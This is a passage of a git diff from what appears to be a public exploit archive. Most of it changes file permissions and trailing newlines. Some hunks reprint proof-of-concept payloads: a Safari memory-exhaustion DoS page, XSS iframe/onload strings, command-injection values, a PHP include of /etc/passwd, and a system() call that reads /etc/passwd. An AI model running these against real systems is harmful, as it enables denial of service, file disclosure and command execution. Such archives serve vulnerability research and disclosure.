21000000); document.write(finalslope2); document.write(finalslope); function expand (slope, size) { var i = Math.ceil(Math.log(size) / Math.LN2), res = slope; do { res += res; } while (0 < --i); return res.slice(0, slope.length * size); } </script> </head> <body> </body> </html> <html><body><center><h1> Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body></html> \ No newline at end of file +<html> <head> <script language="JavaScript" type="Text/Javascript"> var slope = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141"); var slope2 = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); var finalslope2 = expand(slope2, 49000000); var finalslope = expand(slope, 21000000); document.write(finalslope2); document.write(finalslope); function expand (slope, size) { var i = Math.ceil(Math.log(size) / Math.LN2), res = slope; do { res += res; } while (0 < --i); return res.slice(0, slope.length * size); } </script> </head> <body> </body> </html> <html><body><center><h1> Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center></body></html> \ No newline at end of file diff --git a/platforms/osx/remote/40930.txt b/platforms/osx/remote/40930.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/758.c b/platforms/osx/remote/758.c old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/8753.txt b/platforms/osx/remote/8753.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/remote/96.c b/platforms/osx/remote/96.c old mode 100755 new mode 100644 diff --git a/platforms/osx/shellcode/15618.c b/platforms/osx/shellcode/15618.c old mode 100755 new mode 100644 diff --git a/platforms/osx/shellcode/17224.s b/platforms/osx/shellcode/17224.s old mode 100755 new mode 100644 diff --git a/platforms/osx/shellcode/17564.asm b/platforms/osx/shellcode/17564.asm old mode 100755 new mode 100644 diff --git a/platforms/osx/shellcode/38065.txt b/platforms/osx/shellcode/38065.txt old mode 100755 new mode 100644 diff --git a/platforms/osx/shellcode/38126.c b/platforms/osx/shellcode/38126.c old mode 100755 new mode 100644 diff --git a/platforms/osx/webapps/40359.txt b/platforms/osx/webapps/40359.txt old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13478.c b/platforms/osx_ppc/shellcode/13478.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13479.c b/platforms/osx_ppc/shellcode/13479.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13480.c b/platforms/osx_ppc/shellcode/13480.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13481.c b/platforms/osx_ppc/shellcode/13481.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13482.c b/platforms/osx_ppc/shellcode/13482.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13483.c b/platforms/osx_ppc/shellcode/13483.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13484.c b/platforms/osx_ppc/shellcode/13484.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13485.c b/platforms/osx_ppc/shellcode/13485.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13486.c b/platforms/osx_ppc/shellcode/13486.c old mode 100755 new mode 100644 diff --git a/platforms/osx_ppc/shellcode/13487.c b/platforms/osx_ppc/shellcode/13487.c old mode 100755 new mode 100644 diff --git a/platforms/palm_os/dos/22602.c b/platforms/palm_os/dos/22602.c old mode 100755 new mode 100644 diff --git a/platforms/palm_os/local/20241.txt b/platforms/palm_os/local/20241.txt old mode 100755 new mode 100644 diff --git a/platforms/palm_os/local/20505.txt b/platforms/palm_os/local/20505.txt old mode 100755 new mode 100644 diff --git a/platforms/palm_os/local/20746.c b/platforms/palm_os/local/20746.c old mode 100755 new mode 100644 diff --git a/platforms/palm_os/webapps/28659.txt b/platforms/palm_os/webapps/28659.txt old mode 100755 new mode 100644 diff --git a/platforms/perl/webapps/37115.txt b/platforms/perl/webapps/37115.txt old mode 100755 new mode 100644 diff --git a/platforms/perl/webapps/37117.txt b/platforms/perl/webapps/37117.txt old mode 100755 new mode 100644 index 22e6beed5..9c1f812de --- a/platforms/perl/webapps/37117.txt +++ b/platforms/perl/webapps/37117.txt @@ -21,4 +21,4 @@ URL: http://www.example.com/croogo/admin/roles <tr class="striped"><td>4</td> <td>"><iframe src="a" onload='alert("VL")' <<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td> -<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete \ No newline at end of file +<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete \ No newline at end of file diff --git a/platforms/perl/webapps/37126.txt b/platforms/perl/webapps/37126.txt old mode 100755 new mode 100644 diff --git a/platforms/perl/webapps/39564.txt b/platforms/perl/webapps/39564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/10242.txt b/platforms/php/dos/10242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/10243.txt b/platforms/php/dos/10243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/1064.c b/platforms/php/dos/1064.c old mode 100755 new mode 100644 diff --git a/platforms/php/dos/11397.txt b/platforms/php/dos/11397.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/12154.txt b/platforms/php/dos/12154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/12259.php b/platforms/php/dos/12259.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/12554.txt b/platforms/php/dos/12554.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/1345.php b/platforms/php/dos/1345.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/14678.txt b/platforms/php/dos/14678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/1517.c b/platforms/php/dos/1517.c old mode 100755 new mode 100644 diff --git a/platforms/php/dos/15431.txt b/platforms/php/dos/15431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/1573.php b/platforms/php/dos/1573.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/1651.php b/platforms/php/dos/1651.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18023.java b/platforms/php/dos/18023.java old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18296.txt b/platforms/php/dos/18296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18458.txt b/platforms/php/dos/18458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18460.php b/platforms/php/dos/18460.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18909.php b/platforms/php/dos/18909.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18910.php b/platforms/php/dos/18910.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18976.php b/platforms/php/dos/18976.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18977.php b/platforms/php/dos/18977.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/18978.php b/platforms/php/dos/18978.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/21428.txt b/platforms/php/dos/21428.txt old mode 100755 new mode 100644 index 049dd0691..d4e8fbec4 --- a/platforms/php/dos/21428.txt +++ b/platforms/php/dos/21428.txt @@ -9,4 +9,4 @@ Reportedly, submitting a specially crafted URL will successfully remove user acc It should be noted that known usernames of the system is required. -http://www.host.com/supp_membre.php?choix_membre_supp=polom \ No newline at end of file +http://www.host.com/supp_membre.php?choix_membre_supp=polom \ No newline at end of file diff --git a/platforms/php/dos/22110.txt b/platforms/php/dos/22110.txt old mode 100755 new mode 100644 index d8423d6b9..7b275a55b --- a/platforms/php/dos/22110.txt +++ b/platforms/php/dos/22110.txt @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported for the modules.php script u An attacker can exploit this vulnerability by modifying certain parameters when making a request for the modules.php script. This will prevent visitors to the site hosting PHP-Nuke from creating a new account thereby leading to a denial of service vulnerability. -http://target.com/modules.php?name=Your_Account&op=userinfo&uname= \ No newline at end of file +http://target.com/modules.php?name=Your_Account&op=userinfo&uname= \ No newline at end of file diff --git a/platforms/php/dos/22419.php b/platforms/php/dos/22419.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/22425.php b/platforms/php/dos/22425.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/22426.php b/platforms/php/dos/22426.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/22435.php b/platforms/php/dos/22435.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/22494.txt b/platforms/php/dos/22494.txt old mode 100755 new mode 100644 index baae98c07..d9fb79303 --- a/platforms/php/dos/22494.txt +++ b/platforms/php/dos/22494.txt @@ -4,4 +4,4 @@ It has been reported that an attacker may trigger a denial of service condition It should be noted that although osCommerce version 2.2cvs was reported vulnerable, previous versions may also be affected. -product_info.php?products_id=[large amount of random content] \ No newline at end of file +product_info.php?products_id=[large amount of random content] \ No newline at end of file diff --git a/platforms/php/dos/22660.txt b/platforms/php/dos/22660.txt old mode 100755 new mode 100644 index b4fa0da52..938b88aa6 --- a/platforms/php/dos/22660.txt +++ b/platforms/php/dos/22660.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/7702/info some submissions to the rating system. Because of this, a remote attacker may be able to submit a string that causes a denial of service to legitmate users. -http://www.example.com/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] \ No newline at end of file +http://www.example.com/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] \ No newline at end of file diff --git a/platforms/php/dos/23311.txt b/platforms/php/dos/23311.txt old mode 100755 new mode 100644 index b6986ff64..bd4f67797 --- a/platforms/php/dos/23311.txt +++ b/platforms/php/dos/23311.txt @@ -8,4 +8,4 @@ It should be noted that although this vulnerability has been reported to affect In the Name inputbox of the Chatbox type: -<script = javascript> alert('DoS') <script> \ No newline at end of file +<script = javascript> alert('DoS') <script> \ No newline at end of file diff --git a/platforms/php/dos/23750.txt b/platforms/php/dos/23750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/24621.txt b/platforms/php/dos/24621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/24854.txt b/platforms/php/dos/24854.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/24855.txt b/platforms/php/dos/24855.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/25752.txt b/platforms/php/dos/25752.txt old mode 100755 new mode 100644 index 7b1e395e5..211c5bc7d --- a/platforms/php/dos/25752.txt +++ b/platforms/php/dos/25752.txt @@ -6,4 +6,4 @@ An attacker can send an email message with a malformed header field to initiate PHPMailer 1.72 and prior versions are affected by this issue. -From: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... x 998 \ No newline at end of file +From: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... x 998 \ No newline at end of file diff --git a/platforms/php/dos/29577.php b/platforms/php/dos/29577.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/29692.txt b/platforms/php/dos/29692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/29693.txt b/platforms/php/dos/29693.txt old mode 100755 new mode 100644 index 7aff6c277..afb47a7a6 --- a/platforms/php/dos/29693.txt +++ b/platforms/php/dos/29693.txt @@ -8,4 +8,4 @@ Although this issue is local in nature, a remote attacker may exploit it by usin This issue affects all versions of PHP. -$ curl http://www.example.com/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1 \ No newline at end of file +$ curl http://www.example.com/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1 \ No newline at end of file diff --git a/platforms/php/dos/29823.c b/platforms/php/dos/29823.c old mode 100755 new mode 100644 diff --git a/platforms/php/dos/30395.txt b/platforms/php/dos/30395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/30401.php b/platforms/php/dos/30401.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/30753.txt b/platforms/php/dos/30753.txt old mode 100755 new mode 100644 index ff80a3ab7..99dd80740 --- a/platforms/php/dos/30753.txt +++ b/platforms/php/dos/30753.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to consume excessive AutoIndex PHP Script 2.2.2 and 2.2.3 are vulnerable to this issue; prior versions may also be affected. -http://www.example.com/AutoIndex/index.php?dir=%00 \ No newline at end of file +http://www.example.com/AutoIndex/index.php?dir=%00 \ No newline at end of file diff --git a/platforms/php/dos/30760.txt b/platforms/php/dos/30760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/32715.php b/platforms/php/dos/32715.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/32769.php b/platforms/php/dos/32769.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/33625.php b/platforms/php/dos/33625.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/33677.txt b/platforms/php/dos/33677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/33755.php b/platforms/php/dos/33755.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/34505.txt b/platforms/php/dos/34505.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35164.php b/platforms/php/dos/35164.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35354.txt b/platforms/php/dos/35354.txt old mode 100755 new mode 100644 index 331d28cf8..cf2f03be2 --- a/platforms/php/dos/35354.txt +++ b/platforms/php/dos/35354.txt @@ -8,4 +8,4 @@ PHP 5.3.5 is vulnerable; other versions may also be affected. The following proof-of-concept is available: -grapheme_extract('a',-1); \ No newline at end of file +grapheme_extract('a',-1); \ No newline at end of file diff --git a/platforms/php/dos/35358.txt b/platforms/php/dos/35358.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35413.php b/platforms/php/dos/35413.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35414.txt b/platforms/php/dos/35414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35415.txt b/platforms/php/dos/35415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35483.txt b/platforms/php/dos/35483.txt old mode 100755 new mode 100644 index f61cf560a..0ca277417 --- a/platforms/php/dos/35483.txt +++ b/platforms/php/dos/35483.txt @@ -6,4 +6,4 @@ Successful attacks will cause the application to crash, creating a denial-of-ser PHP versions prior to 5.3.6 are vulnerable. -numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "") \ No newline at end of file +numfmt_set_symbol(numfmt_create("en", NumberFormatter::PATTERN_DECIMAL), 2147483648, "") \ No newline at end of file diff --git a/platforms/php/dos/35484.php b/platforms/php/dos/35484.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35485.php b/platforms/php/dos/35485.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35486.php b/platforms/php/dos/35486.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35487.php b/platforms/php/dos/35487.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/35539.txt b/platforms/php/dos/35539.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/36070.txt b/platforms/php/dos/36070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/36158.txt b/platforms/php/dos/36158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/36682.php b/platforms/php/dos/36682.php old mode 100755 new mode 100644 index e9ed71b72..7cfd84680 --- a/platforms/php/dos/36682.php +++ b/platforms/php/dos/36682.php @@ -15,4 +15,4 @@ $result = $stmt->fetch(PDO::FETCH_LAZY); session_start(); $_SESSION['PDORow'] = $result; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/36789.php b/platforms/php/dos/36789.php old mode 100755 new mode 100644 index a3048cdb4..a724988f5 --- a/platforms/php/dos/36789.php +++ b/platforms/php/dos/36789.php @@ -11,4 +11,4 @@ while (true) { strtotime('Monday 00:00 Europe/Paris'); // Memory leak } -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/37566.php b/platforms/php/dos/37566.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38120.txt b/platforms/php/dos/38120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38121.txt b/platforms/php/dos/38121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38122.txt b/platforms/php/dos/38122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38123.txt b/platforms/php/dos/38123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38125.txt b/platforms/php/dos/38125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/38442.txt b/platforms/php/dos/38442.txt old mode 100755 new mode 100644 index 2449cb208..3990c19f7 --- a/platforms/php/dos/38442.txt +++ b/platforms/php/dos/38442.txt @@ -24,4 +24,4 @@ comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-1 3.) Solution: -None. - No Update available for it. \ No newline at end of file +None. - No Update available for it. \ No newline at end of file diff --git a/platforms/php/dos/39653.txt b/platforms/php/dos/39653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40301.php b/platforms/php/dos/40301.php old mode 100755 new mode 100644 index 44f3c7c1a..0d2c0ef98 --- a/platforms/php/dos/40301.php +++ b/platforms/php/dos/40301.php @@ -12,4 +12,4 @@ if (!extension_loaded("domxml")) die("You need domxml extension loaded!"); $str = str_repeat('A', 9999); domxml_open_file($str); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40302.php b/platforms/php/dos/40302.php old mode 100755 new mode 100644 index 154e1d2f9..d64e82207 --- a/platforms/php/dos/40302.php +++ b/platforms/php/dos/40302.php @@ -18,4 +18,4 @@ class MyCloneableClass } $obj = new MyCloneableClass(); $obj2 = clone $obj; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40305.txt b/platforms/php/dos/40305.txt old mode 100755 new mode 100644 index 8549890ec..45c11adbb --- a/platforms/php/dos/40305.txt +++ b/platforms/php/dos/40305.txt @@ -12,4 +12,4 @@ if (!extension_loaded("domxml")) die("You need domxml extension loaded!"); $str = str_repeat('A', 9999); simplexml_load_file($str); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40306.php b/platforms/php/dos/40306.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40313.php b/platforms/php/dos/40313.php old mode 100755 new mode 100644 index 9b8815adb..49a8389c3 --- a/platforms/php/dos/40313.php +++ b/platforms/php/dos/40313.php @@ -12,4 +12,4 @@ if (!extension_loaded("imap")) die("You need imap extension loaded!"); $str = str_repeat('A', 9999); imap_mail($str,'',''); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40314.php b/platforms/php/dos/40314.php old mode 100755 new mode 100644 index 149d2b7bf..7fd265544 --- a/platforms/php/dos/40314.php +++ b/platforms/php/dos/40314.php @@ -11,4 +11,4 @@ if (!extension_loaded("domxml")) die("You need domxml extension loaded!"); hw_docbyanchor(0,0); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40315.php b/platforms/php/dos/40315.php old mode 100755 new mode 100644 index 34f64aa68..1ce15c2c7 --- a/platforms/php/dos/40315.php +++ b/platforms/php/dos/40315.php @@ -12,4 +12,4 @@ if (!extension_loaded("domxml")) die("You need domxml extension loaded!"); $str = str_repeat('A', 9999); html_doc_file($str); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/dos/40316.php b/platforms/php/dos/40316.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40317.php b/platforms/php/dos/40317.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40318.php b/platforms/php/dos/40318.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40319.php b/platforms/php/dos/40319.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40320.php b/platforms/php/dos/40320.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40321.php b/platforms/php/dos/40321.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40329.php b/platforms/php/dos/40329.php old mode 100755 new mode 100644 diff --git a/platforms/php/dos/40996.txt b/platforms/php/dos/40996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/dos/6481.c b/platforms/php/dos/6481.c old mode 100755 new mode 100644 diff --git a/platforms/php/dos/738.c b/platforms/php/dos/738.c old mode 100755 new mode 100644 diff --git a/platforms/php/local/10296.txt b/platforms/php/local/10296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/local/10557.php b/platforms/php/local/10557.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/20985.php b/platforms/php/local/20985.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/21347.php b/platforms/php/local/21347.php old mode 100755 new mode 100644 index fb9fcc253..3c7c0e393 --- a/platforms/php/local/21347.php +++ b/platforms/php/local/21347.php @@ -33,4 +33,4 @@ Upload a file: <input name='file' type='file'> <input type='submit' value='Upload'> </form> "; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/local/2152.php b/platforms/php/local/2152.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/22911.php b/platforms/php/local/22911.php old mode 100755 new mode 100644 index 1f832e0b8..28c5ffb88 --- a/platforms/php/local/22911.php +++ b/platforms/php/local/22911.php @@ -9,4 +9,4 @@ This issue is reported to exist in PHP versions 4.3.0 and later. <? echo("trying to read /etc/passwd"); include("/etc/passwd"); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/local/23022.c b/platforms/php/local/23022.c old mode 100755 new mode 100644 diff --git a/platforms/php/local/23023.c b/platforms/php/local/23023.c old mode 100755 new mode 100644 diff --git a/platforms/php/local/24173.txt b/platforms/php/local/24173.txt old mode 100755 new mode 100644 index 065ae052a..78d8d3986 --- a/platforms/php/local/24173.txt +++ b/platforms/php/local/24173.txt @@ -6,4 +6,4 @@ This issue might allow an attacker to execute arbitrary shell commands on a comp This issue is reported to affect PHP under Microsoft Windows version 4.3.3 and 4.3.5, it is likely that other Microsoft Windows versions are affected as well. -" || dir || \ No newline at end of file +" || dir || \ No newline at end of file diff --git a/platforms/php/local/25040.php b/platforms/php/local/25040.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/26352.php b/platforms/php/local/26352.php old mode 100755 new mode 100644 index 59e8a3cc6..7817e7840 --- a/platforms/php/local/26352.php +++ b/platforms/php/local/26352.php @@ -22,4 +22,4 @@ $file=curl_exec($ch); echo $file; -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/local/27334.txt b/platforms/php/local/27334.txt old mode 100755 new mode 100644 diff --git a/platforms/php/local/27335.txt b/platforms/php/local/27335.txt old mode 100755 new mode 100644 diff --git a/platforms/php/local/28504.php b/platforms/php/local/28504.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/29239.txt b/platforms/php/local/29239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/local/29528.txt b/platforms/php/local/29528.txt old mode 100755 new mode 100644 index 0db6a1b12..80a539d40 --- a/platforms/php/local/29528.txt +++ b/platforms/php/local/29528.txt @@ -6,4 +6,4 @@ This vulnerability would be an issue in shared-hosting configurations where mult This issue is reported to affect PHP version 5.2.0; other versions may also be vulnerable. -php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' \ No newline at end of file +php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' \ No newline at end of file diff --git a/platforms/php/local/29712.txt b/platforms/php/local/29712.txt old mode 100755 new mode 100644 index 0e3cf885b..dff7a4ce5 --- a/platforms/php/local/29712.txt +++ b/platforms/php/local/29712.txt @@ -42,4 +42,4 @@ zend_extension=/var/www/upload/evil.so ... zend_gui_password=OLDMD5 -The next time the webserver is restarted, the injected malicious Zend Extension will be loaded and executed with root permissions. \ No newline at end of file +The next time the webserver is restarted, the injected malicious Zend Extension will be loaded and executed with root permissions. \ No newline at end of file diff --git a/platforms/php/local/29801.php b/platforms/php/local/29801.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/29804.php b/platforms/php/local/29804.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/31937.txt b/platforms/php/local/31937.txt old mode 100755 new mode 100644 diff --git a/platforms/php/local/32343.php b/platforms/php/local/32343.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/32693.php b/platforms/php/local/32693.php old mode 100755 new mode 100644 index 38ab948ce..99bd41eda --- a/platforms/php/local/32693.php +++ b/platforms/php/local/32693.php @@ -67,4 +67,4 @@ echo "[-] evil .htaccess Not found!\n"; system("pwd;ls -lia;uname -a;cat /etc/passwd"); #EOF -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/php/local/32901.php b/platforms/php/local/32901.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/33161.php b/platforms/php/local/33161.php old mode 100755 new mode 100644 diff --git a/platforms/php/local/43056.py b/platforms/php/local/43056.py index e8acf14fb..02649871f 100755 --- a/platforms/php/local/43056.py +++ b/platforms/php/local/43056.py @@ -62,4 +62,4 @@ data = urllib.urlencode(values) req = urllib2.Request(url, data) response = urllib2.urlopen(req) html = response.read() -print html +print html \ No newline at end of file diff --git a/platforms/php/local/9842.txt b/platforms/php/local/9842.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/10083.txt b/platforms/php/remote/10083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/remote/10097.php b/platforms/php/remote/10097.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/19553.txt b/platforms/php/remote/19553.txt old mode 100755 new mode 100644 index 8b89505b7..dec469549 --- a/platforms/php/remote/19553.txt +++ b/platforms/php/remote/19553.txt @@ -11,4 +11,4 @@ The problem lies in the line: By exploiting this problem users can view any file on the system which the http daemon user id has access to. http://some.stupid.isp.net/~dumbuser/cool-logs/mlog.html?screen=[fully -qualified path to any file on the system] \ No newline at end of file +qualified path to any file on the system] \ No newline at end of file diff --git a/platforms/php/remote/19708.php b/platforms/php/remote/19708.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/20286.c b/platforms/php/remote/20286.c old mode 100755 new mode 100644 diff --git a/platforms/php/remote/21155.txt b/platforms/php/remote/21155.txt old mode 100755 new mode 100644 index 7d4a52ad2..a3de7ebcb --- a/platforms/php/remote/21155.txt +++ b/platforms/php/remote/21155.txt @@ -7,4 +7,4 @@ A problem with the package has been discovered that could allow remote users to This makes it possible for a remote user to execute arbitrary commands, and potentially gain access to a vulnerable host. Asking the Php script for Pinging, Nmap, or traceroute this kind of adresse -<www.somehost.com;ls -al> will allow any user to run " ls -al " command as whatever user runs the web server. \ No newline at end of file +<www.somehost.com;ls -al> will allow any user to run " ls -al " command as whatever user runs the web server. \ No newline at end of file diff --git a/platforms/php/remote/21264.php b/platforms/php/remote/21264.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/21265.php b/platforms/php/remote/21265.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/21266.php b/platforms/php/remote/21266.php old mode 100755 new mode 100644 diff --git a/platforms/php/remote/22696.txt b/platforms/php/remote/22696.txt old mode 100755 new mode 100644 index 8b6ca999a..ac383c468 --- a/platforms/php/remote/22696.txt +++ b/platforms/php/remote/22696.txt @@ -4,4 +4,4 @@ A cross-site scripting vulnerability has been discovered in PHP. The problem occ Successful exploitation of this issue would allow an attacker to execute arbitrary script code in a victim's browser within the context of the visited website. This may allow for the 